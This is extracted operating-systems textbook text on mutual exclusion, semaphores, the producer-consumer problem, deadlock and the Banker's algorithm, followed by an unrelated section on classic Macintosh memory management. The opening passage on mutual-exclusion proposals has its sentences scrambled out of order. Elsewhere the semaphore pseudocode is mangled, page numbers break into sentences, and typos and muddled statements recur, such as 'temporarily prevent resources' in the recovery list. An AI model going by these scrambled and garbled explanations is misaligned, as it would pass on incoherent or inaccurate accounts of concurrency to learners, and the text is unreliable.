two processes may at the same moment inside their critical sections. 88 . This is called Mutual Exclusion. We need four conditions to hold to have a good solution for the critical section problem (mutual exclusion).The key to preventing trouble involving shared storage is find some way to prohibit more than one process from reading and writing the shared data simultaneously. Codes that alter one or more variables that are possibly being referenced in “read-updatawrite” fashion by another thread. Codes alter any part of a data structure while it is possibly in use by another thread. when that process has finished executing the shared variable. one must identify codes in Critical Sections in each thread.when processes are performing operations that do not conflict with one another they should be allowed to proceed concurrently.

Taking turns is not a good idea when one of the processes is much slower than the other. With interrupts turned off the CPU could not be switched to other process.some process is in its critical section. no other process will enter its critical and mutual exclusion achieved. no other process should allowed to enter in its critical section. we consider a single. Suppose process 0 finishes its critical section quickly. This situation violates above mentioned condition 3. The flaw in this proposal can be best explained by example. Hence. When the process A runs again. but it is not appropriate as a general mutual exclusion mechanism for users process. and two processes will be in their critical section simultaneously. Proposal 1 -Disabling Interrupts (Hardware Solution) Each process disables all interrupts just after entering in its critical section and re-enable all interrupts just before leaving critical section. the integer variable 'turn' keeps track of whose turn is to enter the critical section. Disabling interrupts is sometimes a useful interrupts is sometimes a useful technique within the kernel of an operating system. the process just waits until (lock) variable becomes 0. Suppose process A sees that the lock is 0. The reason is that it is unwise to give user process the power to turn off interrupts. the process first sets it to 1 and then enters the critical section. Before it can set the lock to 1 another process B is scheduled. When a process wants to enter in its critical section. No process should wait arbitrary long to enter its critical section. process A inspect turn. Proposal 3 . Proposal 2 . it first test the lock.Continuously testing a variable waiting for some value to appear is called the Busy-Waiting. shared. If the lock is already 1. Thus.• • No process should outside its critical section should block other processes. runs. Proposals for Achieving Mutual Exclusion The mutual exclusion problem is to devise a pre-protocol (or entry protocol) and a postprotocol (or exist protocol) to keep two or more threads from being in their critical sections at the same time. it will also set the lock to 1. (lock) variable. Using Systems calls 'sleep' and 'wakeup' 89 . and 1 means hold your horses . Process B also finds it to be 0 and sits in a loop continually testing 'turn' to see when it becomes 1. Problem When one process is updating shared modifiable data in its critical section. finds it to be 0. If lock is 0. a 0 means that no process in its critical section.Lock Variable (Software Solution) In this solution. Initially. so both processes are now in their noncritical section. initially 0.Strict Alteration In this proposed solution. and sets the lock to 1. Tanenbaum examine proposals for critical-section problem or mutual exclusion problem. and enters in its critical section.

Statement To suspend the producers when the buffer is full. that is.Basically.e.. The producer wants to put a new data in the buffer. This approach waste CPU-time. Two processes share a common. Solution: Producer goes to sleep and to be awakened when the consumer has removed data. written as P(S) or wait (S). 2. Binary Semaphores can assume only the value 0 or the value 1 counting semaphores also called general semaphores can assume only nonnegative values. The producer puts information into the buffer and the consumer takes information out. be suspended until some other process wakes it up. The consumer wants to remove data the buffer but buffer is already empty.e. This approaches also leads to same race conditions we have seen in earlier approaches. Both 'sleep' and 'wakeup' system calls have one parameter that represents a memory address used to match up 'sleeps' and ‘wakeups’. Now look at some interprocess communication primitives is the pair of steep-wakeup. fixed-size (bounded) buffer. what above mentioned solution do is this: when a processes wants to enter in its critical section .. it checks to see if then entry is allowed. As an example how sleep-wakeup system calls are used. and to make sure that only one process at a time manipulates a buffer so there are no race conditions or lost updates. If it is not. Semaphores A semaphore is a protected variable whose value can be accessed and altered only by the operations P and V and initialization operation called 'Semaphoiinitislize'. the process goes into tight loop and waits (i. operates as follows: 90 . Solution: Consumer goes to sleep until the producer puts some data in buffer and wakes consumer up. to suspend the consumers when the buffer is empty. a finite numbers of slots are available. start busy waiting) until it is allowed to enter. consider the producer-consumer problem also known as bounded buffer problem. The essence of the problem is that a wakeup call. but buffer is already full. • • Sleep: It is a system call that causes the caller to block. The P (or wait or sleep or down) operation on semaphores S. Wakeup: It is a system call that wakes up the process. The Bounded Buffer Producers and Consumers The bounded buffer producers and consumers assume that there is a fixed buffer size i. Trouble arises when 1. sent to a process that is not sleeping. is lost. Race condition can occur due to the fact that access to 'count' is unconstrained.

i.P(S): IF S THEN ELSE > 0 S – 1 S := (wait on S) The V (or signal or wakeup or up) operation on semaphore S. operates as follows: V(S): IF (one or more process are waiting on S) THEN (let one of these processes proceed) ELSE S: = S +1 Operations P and V are done as single.. empty and mutex. i. The other processes will be kept waiting. S. P (empty). namely. indivisible. The semaphore 'full' is used for counting the number of slots in the buffer that are full.e. Mutual exclusion on the semaphore. but the implementation of P and V guarantees that processes will not suffer indefinite postponement. 91 . only process will be allowed to proceed. P (mutex).e. written as V(S) or signal (S). The 'empty' for counting the number of slots that are empty and semaphore 'mutex' to make sure that the producer and consumer do not access modifiable shared section of the buffer simultaneously. Producer ( ) WHILE (true) produce-Item ( ).. semaphore mutex = 1. It is guaranteed that once a semaphore operations has stared. semaphore empty = N. For control access to critical section set mutex to 1. semaphore Full = 0. i. enter-Item ( ) V (mutex) V (full). Initialization • • • Set full buffer slots to 0. Semaphores solve the lost-wakeup problem. no other process can access the semaphore until operation has completed. Set empty buffer slots to N. Producer-Consumer Problem Using Semaphores The Solution to producer-consumer problem uses three semaphores. is enforced within P(S) and V(S). atomic action. full..e. If several processes attempt a P(S) simultaneously.

each member of the set of deadlock processes is waiting for a resource that can be released only by a deadlock process. remove-Item ( ). None of the processes can run. V (mutex). and CPU Cycles. Examples of physical resources are Printers. The resources may be either physical or logical. Memory Space. consume-Item (Item) CHAPTER 7 DEADLOCK Definition “Crises and deadlocks when they occur have at least this advantage that they force us to think. Now. Examples of logical resources are Files. a printer.Jawaharlal Nehru (1889 . and none of them can be awakened. The simplest example of deadlock is where process 1 has been allocated non-shareable resources A.”. say. if it turns out that process 1 needs resource B (printer) to proceed and process 2 needs 92 . and Monitors. none of them can release any resources. a tap drive.Consumer ( ) WHILE (true) P (full) P (mutex). It is important to note that the number of processes and the number and kind of resources possessed and requested are unimportant. say.1964) Indian political leader A set of process is in a deadlock state if each process in the set is waiting for an event that can be caused by only another process in the set. In other words. V (empty). Semaphores. Tape Drivers. and process 2 has be allocated non-sharable resource B.

The system is in deadlock state because each process holds a resource being requested by the other process neither process is willing to release the resource it holds. If another process requests that resource. Hold and Wait Condition: Requesting process hold already. only one process at a time claims exclusive control of the resource. each is blocked the other and all useful work in the system stops. a nonpreemptable resource is one that cannot be taken away from process (without causing ill effect).resource A (the tape drive) to proceed and these are the only two processes in the system. Preemptable and Nonpreemptable Resources Resources come in two flavors: preemptable and nonpreemptable. No-Preemptive Condition: Resources already allocated to a process cannot be preempted. On the other hand. the requesting process must be delayed until the resource has been released. Circular Wait Condition: The processes in the system form a circular list or chain where each process in the list is waiting for a resource held by the next process in the list. This situation ifs termed deadlock. Reallocating resources can resolve deadlocks that involve preemptable resources. As an example. Explanation: There must exist a process that is holding a resource already allocated to it while waiting for additional resource that are currently being held by other processes. Explanation: At least one resource (thread) must be held in a non-shareable mode. A preemptable resource is one that can be taken away from the process with no ill effects. Deadlock Condition Necessary and Sufficient Deadlock Conditions Coffman (1971) identified four (4) conditions that must hold simultaneously for there to be a deadlock. Memory is an example of a preemptable resource. Explanation: Resources cannot be removed from the processes are used to completion or released voluntarily by the process holding it. that is. CD resources are not preemptable at an arbitrary moment. Deadlocks that involve nonpreemptable resources are difficult to deal with. For example. resources while waiting for requested resources. Mutual Exclusion Condition: The resources involved are non-shareable. consider the traffic deadlock in the following figure 93 .

since only one vehicle can be on a section of the street at a time. since each vehicle is waiting on the next vehicle to move. No-preemptive condition applies. Hold-and-wait condition applies. The deadlock involves a circular “hold-and-wait” condition between two or more processes. each thread has access to the resources held by the process. since a section of the street that is a section of the street that is occupied by a vehicle cannot be taken away from it. That is. because it is the process that holds resources.Consider each section of the street as a resource. • • • • Mutual exclusion condition applies. The simple rule to avoid traffic deadlock is that a vehicle should only enter an intersection if it is assured that it will not have to stop inside the intersection. not the thread that is. there are four strategies of dealing with deadlock problem: • The Ostrich Approach: Just ignore the deadlock problem altogether. and waiting to move on to the next section of the street. yet be waiting for another resource that it is holding. each vehicle in the traffic is waiting for a section of street held by the next vehicle in the traffic. Circular wait condition applies. since each vehicle is occupying a section of the street. Dealing with Deadlock Problem In general. 94 . It is not possible to have a deadlock involving only one single process. In addition. deadlock is not possible between two threads in a process. so “one” process cannot hold a resource.

however. With this rule. This strategy can lead to serious waste of resources. it may not hold any resources. Deadlock Prevention Havender in his pioneering work showed that since all four of the conditions are necessary for deadlock to occur. That is. can be denied by imposing a total ordering on all of the resource types and than forcing. The second alternative is to disallow a process from requesting resources whenever it has previously allocated resources. If the complete set of resources needed by a process is not currently available. all processes to request the resources in order (increasing or decreasing). The first alternative is that a process request be granted all of the resources it needs at once. Note that shareable resources like read-only-file do not require mutually exclusive access and thus cannot be involved in deadlock. 95 . Elimination of “Hold and Wait” Condition: There are two possibilities for elimination of the second condition. If the program needs only one tap drive to begin execution and then does not need the remaining tap drives for several hours. a program requiring ten tap drives must request and receive all ten derives before it begins executing. then the process must wait until the complete set is available. the circular wait. Deadlock Prevention: Prevent deadlock by resource scheduling so as to negate at least one of the four conditions. Since not all the required resources may become available at once. This condition is difficult to eliminate because some resources. For example. Then substantial computer resources (9 tape drives) will sit idle for several hours. and to require that each process requests resources in a numerical order (increasing or decreasing) of enumeration. This strategy impose a total ordering of all resources types. are inherently non-shareable. take steps to recover. Elimination of “Mutual Exclusion” Condition: The mutual exclusion condition must hold for non-sharable resources. This strategy requires that all of the resources a process will need must be requested at once. such as the tap drive and printer. The process must release its held resources and. A process holds resources a second process may need in order to proceed while second process may hold the resources needed by the first process. This is a deadlock. it follows that deadlock might be prevented by denying any one of the conditions.• • • Deadlock Detection and Recovery: Detect deadlock and. several processes cannot simultaneously share a single resource. Elimination of “No-preemption” Condition: The nonpreemption condition can be alleviated by forcing a process waiting for a resource that cannot immediately be allocated to relinquish all of its currently held resources. One serious consequence of this strategy is the possibility of indefinite postponement (starvation). This strategy require that when a process that is holding some resources is denied a request for additional resources. the resource allocation graph can never have a cycle. This strategy can cause indefinite postponement (starvation). While the process waits. Suppose a system does allow processes to hold resources while requesting additional resources. A process might be held off indefinitely as it repeatedly requests and releases the same resources. prior to execution. when it occurs. Elimination of “Circular Wait” Condition: The last condition. request them again together with additional resources. Implementation of this strategy denies the “nopreemptive” condition effectively. The system must grant resources on “all or none” basis. Deadlock Avoidance: Avoid deadlock by careful resource scheduling. if necessary. Consider what happens when a request cannot be satisfied. so that other processes may use them to finish. High Cost when a process releases resources the process may lose all its work to that point. Thus the “wait for” condition is denied and deadlocks simply cannot occur.

The problem with this strategy is that it may be impossible to find an ordering that satisfies everyone. So named because the process is analogous to that used by a banker in deciding if a loan can be safely made. Banker’s Algorithm In this analogy Customers≡ Units Banker ≡ ≡ processes resources. Deadlock Avoidance This approach to the deadlock problem anticipates deadlock before it actually occurs. it is still possible to avoid deadlock by being careful when resources are allocated. Perhaps the most famous deadlock avoidance algorithm. Operating System CustomersUsed A B C D 0 0 0 0 Max 6 5 4 7 Available Units = 10 96 . If the necessary conditions for a deadlock are in place. but it may not request first a plotter and then a printer (order: 3.For example. This method differs from deadlock prevention. but all requests must be made in numerical order. A process may request first printer and then a tape drive (order: 2. provide a global numbering of all the resources. due to Dijkstra [1965]. 4). tape drive say. 2). as shown 1 2 3 4 5 ≡ ≡ ≡ ≡ ≡ Card reader Printer Plotter Tape drive Card punch Now the rule is this: processes can request resources whenever they want to. is the Banker’s algorithm. which guarantees that deadlock cannot occur by denying one of the necessary conditions of deadlock. This approach employs an algorithm to access the possibility that deadlock could occur and acting accordingly.

B. the state of figure 2 is safe because with 2 units left. 97 . The banker reserved only 10 units rather than 22 units to service them. We would have following situation CustomersUsed A B C D 1 2 2 4 Max 6 5 4 7 Available Units = 1 Fig. then banker could not satisfy any of them and we would have a deadlock. What an unsafe state does imply is simply that some unfortunate sequence of events might lead to a deadlock. and D asked for their maximum loans. we see four customers each of whom has been granted a number of credit nits. thus letting C finish and release all four resources. the banker can delay any request except C's. With four units in hand. At certain moment.Fig. Unsafe State: Consider what would happen if a request from B for one more unit were granted in above figure 2. the situation becomes CustomersUsed A B C D 1 1 2 4 Max 6 5 4 7 Available Units = 2 Fig. 3 This is an unsafe state. In other analogy. If all the customers namely A. C. 1 In the above figure. the banker can let either D or B have the necessary units and so on. 2 Safe State: The key to a state being safe is that there is at least one way for all users to finish. It is important to note that an unsafe state does not imply the existence or even the eventual existence a deadlock.

Deadlock Detection Deadlock detection is the process of actually determining that a deadlock exists and identifying the processes and resources involved in the deadlock. the request is granted.The Banker's algorithm is thus to consider each request as it occurs. there needs to be a way to recover several alternatives exists: • • • Temporarily prevent resources from deadlocked processes. Once a deadlock is detected. the overhead is significant. Back off a process to some check point allowing preemption of a needed resource and restarting the process at the checkpoint later. and see if granting it leads to a safe state. it postponed until later. Another potential problem is starvation. CHAPTER 8 MEMORY MANAGEMENT 98 . Haberman [1969] has shown that executing of the algorithm has complexity proportional to N2 where N is the number of processes and since the algorithm is executed each time a resource request occurs. The basic idea is to check allocation against resource availability for all possible allocation sequences to determine if the system is in deadlocked state a. If it does. The complexity of algorithm is O(N2) where N is the number of proceeds. Successively kill processes until the system is deadlock free. same process killed repeatedly. These methods are expensive in the sense that each iteration calls the detection algorithm until the system proves to be deadlock free. Of course. the deadlock detection algorithm is only half of this strategy. otherwise.

It reserves for itself a zone or partition of memory known as the system partition. In general.About Memory A Macintosh computer's available RAM is used by the Operating System.0 and 6. All memory outside the system partition is available for allocation to applications or other software components. In system software version 7. the user can have multiple applications open at once. Figure 1-1 illustrates the organization of memory when several applications are open at the same time.and 32-bit addressing For more complete information on these three topics. applications. it divides the available RAM into two broad sections. Note that application partitions are loaded into the top part of memory first. 99 . This section describes both the general organization of memory by the Operating System and the organization of the emory partition allocated to your application when it is launched. The system partition contains a system heap and a set of global variables.0 and later (or when MultiFinder is running in system software versions 5. When an application is launched. the Operating System assigns it a section of memory known as its application partition. described in the next two sections. This section also provides a preliminary description of three related memory topics: • • • temporary memory virtual memory 24. The system partition occupies the lowest position in memory.0). such as device drivers and system extensions. an application uses only the memory contained in its own application partition. Application partitions occupy part of the remaining space. you need to read the remaining chapters in this book. The system partition always begins at the lowest addressable byte of memory (memory address 0) and extends upward. and other software components. Organization of Memory by the Operating System When the Macintosh Operating System starts up.

The application labeled Application is the active applicationThe System Heap The main part of the system partition is an area of memory known as the system heap. three applications are open. System patches and system extensions (stored as code resources of type 'INIT') are loaded into the system heap during the system startup process. Hardware device drivers (stored as code resources of type 'DRVR') are loaded into the system heap when the driver is opened. In general. All system buffers and queues. For example. and system data structures.In Figure 1-1. Most applications don't need to load anything into the system heap. you might need to load resources or code segments into the system heap. each with its own application partition. for example. you 100 . The system heap is also used for code and other resources that do not belong to specific applications. are allocated in the system heap. if you want a vertical retrace task to continue to execute even when your application is in the background. In certain cases. system code segments. the system heap is reserved for exclusive use by the Operating System and other system software components. which load into it various items such as system resources. however. such as code resources that add features to the Operating System or that provide control of special-purpose peripheral equipment.

Usually. you might need to read or write that value directly. the height of the menu bar (MBarHeight) and pointers to the heads of various operating-system queues (DTQueue. when the value of a low-memory global variable is likely to be useful to applications. Most of these variables are undocumented. and the results of changing their values can be unpredictable. Similar variables contain. Organization of Memory in an Application Partition When your application is launched. In general. and so forth). the Vertical Retrace Manager ignores the task when your application is in the background.need to load the task and any data associated with it into the system heap. The CurrentA5 global variable contains the address of the boundary between the active application's global variables and its application parameters. the Ticks global variable contains the number of ticks (sixtieths of a second) that have elapsed since the system was most recently started up. VBLQueue. The ApplLimit global variable contains the address of the last byte the active application's heap can expand to include. Because these global variables contain information about the active application. Figure 1-2 illustrates the general organization of an application partition. That partition contains required segments of the application's code as well as other data associated with the application. See the chapter "Memory Manager" in this book for instructions on reading and writing the values of low-memory global variables from a high-level language. Other low-memory global variables contain information about the current application. In rare instances. Most low-memory global variables are of this variety: they contain information that is generally useful only to the Operating System or other system software components. for example. For example. In those cases. Otherwise. The Operating System uses these variables to maintain different kinds of information about the operating environment. the Operating System allocates for it a partition of memory called its application partition. For example. the system software provides a routine that you can use to read or write that value. Figure 1-2 Organization of an application partition 101 . The System Global Variables The lowest part of memory is occupied by a collection of global variables called system global variables (or low-memory system global variables). there is no routine that reads or writes the value of a documented global variable. FSQHdr. the Operating System changes the values of these variables whenever a context switch occurs. you can get the current value of the Ticks global variable by calling the Tick Count function. the ApplZone global variable contains the address of the first byte f the active application's partition. it is best to avoid reading or writing low-memory system global variables. For example.

If this happens. In some cases. however. If you were to use all of the heap's free space. the stack is not bounded by ApplLimit. once the heap grows up to ApplLimit. The A5 world is located at the high-memory end of your application partition and is of fixed size. The ApplLimit global variable marks the upper limit to which your heap can grow. toward the top of the heap. there is usually an unused area of memory between the stack and the heap. The stack begins at the low-memory end of the A5 world and expands downward. you can use only the space between the bottom of the heap and ApplLimit. However. the heap grows toward ApplLimit whenever the Memory Manager finds that there is not enough memory in the heap to fill a request.Your application partition is divided into three major parts: • • • the application stack the application heap the application global variables and A5 world The heap is located at the low-memory end of your application partition and always expands (when necessary) toward high memory. the heap immediately extends all the way up to this limit. whether you maximize your application heap or not. Thus. the stack could grow downward 102 . the stack might grow into space reserved for the application heap. If you do not call MaxApplZone. it is very likely that data in the heap will become corrupted. it can grow no further. This unused area provides space for the stack to grow without encroaching upon the space assigned to the application heap. If your application uses heavily nested procedures with many local variables or uses extensive recursion. As you can see in Figure 1-2. the Memory Manager would not allow you to allocate additional blocks above ApplLimit. If you call the MaxApplZone procedure at the beginning of your program. Unlike the heap.

" generates a system error. all that remains is the previous stack with the function result on top. The middle diagram shows the stack expanded to hold the stack frame. so there can never be any unallocated "holes" in the stack. The Application Stack The stack is an area of memory in your application partition that can grow or shrink at one end while the other end remains fixed. the Memory Manager cannot stop your stack from growing beyond ApplLimit and possibly encroaching upon space reserved for the heap. first-out) order. The end of the stack that grows or shrinks is usually referred to as the "top" of the stack. If the function is a Pascal function. the stack is especially useful for memory allocation connected with the execution of functions or procedures. If it has. Figure 1-3. so that you can make adjustments. See "Changing the Size of the Stack" on page 1-39 for instructions on how to change the size of your application stack. the stack grows from high memory toward low memory addresses. This means that space on the stack is always allocated and released in LIFO (last-in. and return address. Figure 1-3 illustrates how the stack expands and shrinks during a function call. the local variables and function parameters are popped off the stack. The application stack 103 . A stack frame contains the routine's parameters.beyond ApplLimit. Once the function is executed. space is automatically allocated on the stack for a stack frame. It also means that the allocated area of the stack is always contiguous. The last item allocated is always the first to be released. The leftmost diagram shows the stack just before the function is called. known as the "stack sniffer. When your application calls a routine. even though it's actually at the lower end of memory occupied by the stack. Space is released only at the top of the stack. the task. This system error alerts you that you have allowed the stack to grow too far. a vertical retrace task checks approximately 60 times each second to see if the stack has moved into the heap. However. local variables. By convention. Because you do not use Memory Manager routines to allocate memory on the stack. never in the middle. Because of its LIFO nature.

the heap doesn't usually grow and shrink in an orderly way. Instead. after your application has been running for a while. as the stack does. either directly (for instance. and so forth. The heap contains virtually all items that are not allocated on the stack. This fragmentation is known as heap fragmentation. When this happens. using the NewHandle function) or indirectly (for instance. the Memory Manager tries to create the needed space by moving allocated blocks together. thus 104 .The Application Heap An application heap is the area of memory in your application partition in which space is dynamically allocated and released on demand. For instance. which can be of any size needed for a particular object. as shown in Figure 1-4. Space in the heap is allocated in locks. Because these operations can occur in any order. You allocate space within your application's heap by making calls to the Memory Manager. The heap begins at the low-memory end of your application partition and extends upward in memory. document data. Even though there is enough free space available. dialog records. Figure 1-4 A fragmented heaps One result of heap fragmentation is that the Memory Manager might not be able to satisfy your application's request to allocate a block of a particular size. the heap can tend to become fragmented into a patchwork of allocated and free blocks. using a routine such as NewWindow. your application heap contains the application's code segments and resources that are currently loaded into memory. The heap also contains other dynamically allocated items such as window records. the space is broken up into blocks smaller than the requested size. which calls Memory Manager routines). The Memory Manager does all the necessary housekeeping to keep track of blocks in the heap as they are allocated and released.

The Application Global Variables and A5 World Your application's global variables are stored in an area of memory near the top of your application partition known as the application A5 world. Figure 1-5 shows the results of compacting the fragmented heap shown in Figure 1-4. although the sizes of the global variables and of the jump table may vary from application to application. Figure 1-6 shows the standard organization of the A5 world. To minimize heap fragmentation. and when it is a locked. There are. relocatable block. Figure 1-6 Organization of an application's A5 world 105 . two situations in which a block is not free to move: when it is a nonrelocatable block. however. Figure 1-5 A compacted heaps Heap fragmentation is generally not a problem as long as the blocks of memory you allocate are free to move during heap compaction. you should use nonrelocatable blocks sparingly.collecting the free space in a single larger block. The A5 world contains four kinds of data: • • • • application global variables application QuickDraw global variables application parameters the application's jump table Each of these items is of fixed size. and you should lock relocatable blocks only when absolutely necessary. This operation is known as heap compaction.

the application's global variables are found as negative offsets from the value of CurrentA5. Temporary Memory In the Macintosh multitasking environment. This information is known collectively as the A5 world because the Operating System uses the microprocessor's A5 register to point to that boundary. each application is limited to a particular memory partition (whose size is determined by information in the 'SIZE' resource of that application).The system global variable CurrentA5 points to the boundary between the current application's global variables and its application parameters. you specify an application partition size that is large enough to hold all the buffers. resources. Your application's jump table contains an entry for each of your application's routines that is called by code in another segment. The Segment Manager uses the jump table to determine the address of any externally referenced routines called by a code segment. is allocated from the available 106 . For example. For this reason. This boundary is important because the Operating System uses it to access the following information from your application: its global variables. The first long word of those parameters is a pointer to your application's QuickDraw global variables. This memory. Your application's QuickDraw global variables contain information about its drawing environment. among these variables is a pointer to the current graphics port. its QuickDraw global variables. and other data that your application is likely to need during its execution. and the jump table. the application parameters. they're reserved for use by the Operating System. you can ask the Operating System to let you use any available memory that is not yet allocated to any other application. If for some reason you need more memory than is currently available in your application heap. In general. The application parameters are 32 bytes of memory located above the application global variables. known as temporary memory. The size of your application's partition places certain limits on the size of your application heap and hence on the sizes of the buffers and other data structures that your application uses.

If you receive the temporary memory. Application 1 has almost exhausted its application heap. that memory is not contiguous with the memory in your application's zone. see the chapter "Memory Manager" in this book. For example. extending from the top of Application 2's partition to the top of the a locatable space. 107 . it has requested and received a large block of temporary memory. all the available memory is allocated to the two open applications. Although using the smaller buffer might prolong the copying operation. For example. For complete details on using temporary memory. If. though perhaps less efficiently. the file is nonetheless copied. you might try to allocate a fairly large buffer of temporary memory. however. in Figure 1-7. the request for temporary memory fails. Figure 1-7 shows an application using some temporary memory. any further requests by either one for some temporary memory would fail. Application 1 can use the temporary memory in whatever manner it desires. As a result. you can instead use a smaller buffer within your application heap. Figure 1-7 Using temporary memory allocated from unused RAM In Figure 1-7. you can copy data from the source file into the destination file using the large buffer. One good reason for using temporary memory only occasionally is that you cannot assume that you will always receive the temporary memory you request. Your application should use temporary memory only for occasional short-term purposes that could be accomplished in less space. usually. if you want to copy a large file.unused RAM.

For complete details on virtual memory. When the blocks in your heap are free to move. the Memory Manager can often reorganize the heap to free space when necessary to fulfill a memory-allocation request. however. In these cases. that is. ROM.0 and later. applications are not 32-bit clean because they manipulate flag bits in master pointers directly (for instance. able to run in an environment where all 32 bits of a memory address are significant. and slot space. Because 8 MB of this total are reserved for I/O space. It describes • relocatable and nonrelocatable blocks 108 . Addressing Modes On suitably equipped Macintosh computers. the Operating System supports 32-bit addressing. where the upper 8 bits of memory addresses are ignored or used as flag bits. It is important to realize that virtual memory operates transparently to most applications. these systems also contain a 24-bit Memory Manager.Virtual Memory In system software version 7. to mark the associated memory blocks as locked or purgeable) instead of using Memory Manager routines to achieve the desired result. by which the machines have a logical address space that extends beyond the limits of the available physical memory. The Operating System extends the address space by using part of the available secondary storage (that is. Because of virtual memory. In some cases. Earlier versions of system software use 24-bit addressing. (For compatibility reasons. see the chapter "Virtual Memory Manager" later in this book. the logical address space has a size of 16 MB. part of a hard disk) to hold portions of applications and data that are not currently needed in RAM. Heap Management Applications allocate and manipulate memory primarily in their application heap. the maximum program address space is 1 GB. The ability to operate with 32-bit addressing is available only on certain Macintosh models. Unless your application has time-critical needs that might be adversely affected by the operation of virtual memory or installs routines that execute at interrupt time.) In order for your application to work when the machine is using 32-bit addressing. thereby making room for the parts that are needed. When some of those portions of memory are needed. the Operating System swaps out unneeded parts of applications or data to the secondary storage. a user can load more programs and data into the logical address space than would fit in the computer's physical RAM. it must be 32-bit clean. In general. blocks in your heap cannot move. suitably equipped Macintosh computers can take advantage of a feature of the Operating System known as virtual memory. When 32-bit addressing is in operation. space in the application heap is allocated and released on demand. Fortunately. that is. As you have seen. namely those with systems that contain a 32-bit Memory Manager. writing applications that are 32-bit clean is relatively easy if you follow the guidelines in Inside Macintosh. This section provides a general description of how to manage blocks of memory in your application heap. you need to pay close attention to memory allocation and management to avoid fragmenting your heap and running out of memory. the ability to use 32 bits to determine memory addresses. you do not need to know whether virtual memory is operating. the largest contiguous program address space is 8 MB. In a 24-bit addressing scheme.

A nonrelocatable block is a block of memory whose location in the heap is fixed.• • • • • properties of relocatable blocks heap purging and compaction heap fragmentation dangling pointers low-memory conditions Relocatable and Nonrelocatable Blocks You can use the Memory Manager to allocate two different types of blocks in your heap: nonrelocatable blocks and relocatable blocks. you can make copies of the pointer variable. Figure 1-8. A pointer to a nonrelocatable block 109 . all copies of the pointer correctly reference the block as long as you don't dispose of it.127. defined by the Ptr data type. After you allocate a nonrelocatable block. A pointer is simply the address of an arbitrary byte in memory. you can use a pointer variable. a relocatable block is a block of memory that can be moved within the heap (perhaps during heap compaction). as illustrated in Figure 1-8. = ^SignedByte. Because a pointer is the address of a block of memory that cannot be moved. and a pointer to a nonrelocatable block of memory is simply the address of the first byte in the block. TYPE SignedByte Ptr = -128. It also provides routines that allow you to allocate and release blocks of both types.. In contrast. The Memory Manager provides data types that reference both relocatable and nonrelocatable blocks. To reference a nonrelocatable block. The Memory Manager sometimes moves relocatable blocks during memory operations so that it can use the space in the heap optimally.

defined by the Handle data type. it updates the master pointer so that it always contains the address of the relocatable block. Figure 1-9 A handle to a relocatable block 110 . as shown in the right side of Figure 1-9. If necessary (perhaps to make room for another block of memory). But the pointer can also be allocated on the stack or in the heap itself. The Memory Manager keeps track of a relocatable block internally with a master pointer. The left side of Figure 1-9 shows a handle to a relocatable block of memory located in the middle of the application heap. the Memory Manager uses a scheme known as double indirection. You reference the block with a handle. A handle contains the address of a master pointer. To reference relocatable blocks. TYPE Handle = ^Ptr. the Memory Manager can move that block down in the heap. When the Memory Manager moves a relocatable block. Often the pointer variable is a global variable and is therefore contained in your application's A5 world. which itself is part of a nonrelocatable master pointer block in your application heap and can never move.The pointer variable itself occupies 4 bytes of space in your application partition.

it is best to allocate them as low in your heap as possible. you should avoid allocating a very large number of handles to small blocks. for example. As you have seen. For this reason. lest your application heap become overly fragmented. Because the blocks of masters pointers are nonrelocatable.Master pointers for relocatable objects in your heap are always allocated in your application heap. but if you allocate many very small relocatable blocks. if it's unlocked. the Memory Manager must allocate extra memory to hold master pointers for relocatable blocks. the cost can be considerable. You need to exercise care when calling Toolbox routines that allocate such blocks. this extra space is negligible. It groups these master pointers into nonrelocatable blocks. but it does carry some overhead. In some cases. the Window Manager internally calls the NewPtr function to allocate a new nonrelocatable block in your application partition. a block can be either purgeable or 111 . The designation of a block as relocatable or nonrelocatable is a permanent property of that block. a heap block can be either relocatable or nonrelocatable. When you call the Window Manager function NewWindow. however. For large relocatable blocks. allocate a single large block and use it as an array to hold the data you need. You can do this by calling the MoreMasters procedure when your application starts up. Whenever possible. Properties of Relocatable Blocks As you have seen. Using relocatable blocks makes the Memory Manager more efficient at managing available space. you should allocate memory in relocatable blocks. This gives the Memory Manager the greatest freedom when rearranging the blocks in your application heap to create a new block of free memory. instead. If relocatable. you may be forced to allocate a nonrelocatable block of memory. a block can be either locked or unlocked.

load user preferences from a preferences file into a relocatable block. When the block is purged. 112 . In addition. If. Purging and Reallocating Relocatable Blocks: One advantage of relocatable blocks is that you can use them to store information that you would like to keep in memory to make your application more efficient. allowing it to move again. except when you allocate memory and resize relocatable blocks. within the loop. A block you create by calling NewHandle is initially unpurgeable. each routine description in Inside Macintosh indicates whether the routine could move or purge memory. If a handle's master pointer is set to NIL. this pointer is said to dangle. you should subsequently check handles to that block before using them if you call any of the routines that could move or purge memory. This might happen. In general. it won't move. predictable times. by rereading the preferences file). your application might. Using locked relocatable blocks can. for instance. you can make the block unpurgeable. the Memory Manager moves unlocked. then the Operating System has purged its block. As long as the block remains in memory. using the HUnlock procedure. Locking and Unlocking Relocatable Blocks: Occasionally. Figure 1-10 illustrates the purging and reallocating of a relocatable block. For example. its master pointer is set to NIL. you must reallocate space for it (perhaps by calling the ReallocateHandle procedure) and then reconstruct its contents (for example. slow the Memory Manager down as much as using nonrelocatable blocks. By making a relocatable block purgeable. In general. These attributes of relocatable blocks can be set and changed as necessary. you need to lock a relocatable block only if there is some danger that it might be moved during the time that you read or write the data in that block. and how to mark them as purgeable or unpurgeable.unpurgeable. then the pointer no longer points to that data. the block whose data you are accessing is in fact moved. Note that the Segment Manager might move memory if you call a routine located in a segment that is not currently resident in memory. If you later want to prohibit the Memory Manager from freeing the space occupied by a relocatable block. but that block's contents are initially undefined. but that you don't really need if available memory space becomes low. you can lock it. Once you have locked a block. Later. Thus. To prevent a block from moving. However. you can rely on all blocks to remain stationary while that code executes. at the beginning of its execution. Fortunately. reopening the file probably wouldn't take enough time to justify keeping the block in memory if memory space were scarce. Once you make a relocatable block purgeable. it can't move relocatable blocks around locked relocatable blocks (just as it can't move them around nonrelocatable blocks). Locking and unlocking blocks every time you want to prevent a block from moving can become troublesome. you might need a relocatable block of memory to stay in one place. however. If you do not call any of those routines in a section of code. relocatable blocks only at welldefined. You can use the HPurge and HNoPurge procedures to change back and forth between these two states. your application can access information from the preferences file without actually reopening the file. you allow the Memory Manager to free the space it occupies if necessary. you can unlock it. using the HLock procedure. When it is reallocated. the handle correctly references a new block. if you dereference a handle to obtain a pointer to the data and (for increased speed) use the pointer within a loop that calls routines that might cause memory to be moved. To use the information formerly in the block. The following sections explain how to lock and unlock blocks. The Memory Manager can't move locked blocks. locking a block in the middle of the heap for long periods of time can increase heap fragmentation.

